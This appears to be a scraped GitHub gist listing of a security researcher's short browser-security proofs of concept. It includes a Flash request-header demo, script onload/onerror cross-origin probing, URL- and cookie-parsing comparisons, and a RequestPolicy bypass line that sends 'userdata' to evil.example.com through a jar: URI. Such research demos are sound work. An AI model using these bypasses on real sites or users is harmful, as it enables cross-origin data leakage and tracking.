Skip to content

Instantly share code, notes, and snippets.

Avatar

Jordan Milne JordanMilne

  • Canada
View GitHub Profile
View testing
aesKeyStringFOOBARBAZQUUXquuxy
aaaa
@JordanMilne
JordanMilne / content-type.mxml
Created Jan 16, 2014
setting the Content-Type header with flash
View content-type.mxml
<?xml version="1.0"?>
<s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:mx="library://ns.adobe.com/flex/mx" xmlns:s="library://ns.adobe.com/flex/spark" >
<fx:Script><![CDATA[
import flash.net.*;
public function sendStuff():void
{
var r:URLRequest = new URLRequest('http://www.youtube.com/foo');
r.method = 'POST';
r.data = '{wow what a great post body}';
View gist:8032399
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
@JordanMilne
JordanMilne / gist:7704136
Created Nov 29, 2013
Demonstration of a RequestPolicy bypass using jar: URIs
View gist:7704136
<img src="jar:http://evil.example.com/logger?userdata=whatever!/foobar" />
@JordanMilne
JordanMilne / gist:6459317
Created Sep 6, 2013
Demonstrates abuse of script error handling
View gist:6459317
<html>
<body>
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
<script src="http://doesntexist.example.com" onload="javascript:alert('universe exploded')" onerror="javascript:alert('doesntexist failed to load as expected')"></script>
</body>
</html>
@JordanMilne
JordanMilne / cookie_jar_tests.json
Created Sep 14, 2015
Comparing the cookie parsing behaviours of various HTTP services
View cookie_jar_tests.json
@JordanMilne
JordanMilne / go-1.3.3.txt
Last active Sep 13, 2015
URL parsing changes from Go 1.3.3 to 1.5.1
View go-1.3.3.txt
Original: http://example.com/foo/%2F/bar
Scheme: http
Hostname: example.com
Path: /foo///bar
Unparsed: http://example.com/foo///bar
Original: http%3A/%2Fexample.com/baz
Scheme:
Hostname:
Path: http://example.com/baz
View foo.py
>>> urlparse.urljoin("https://base.example.org/", "/foobar")
'https://base.example.org/foobar'
>>> urlparse.urljoin("https://base.example.org/", "//foobar")
'https://foobar'
You can’t perform that action at this time.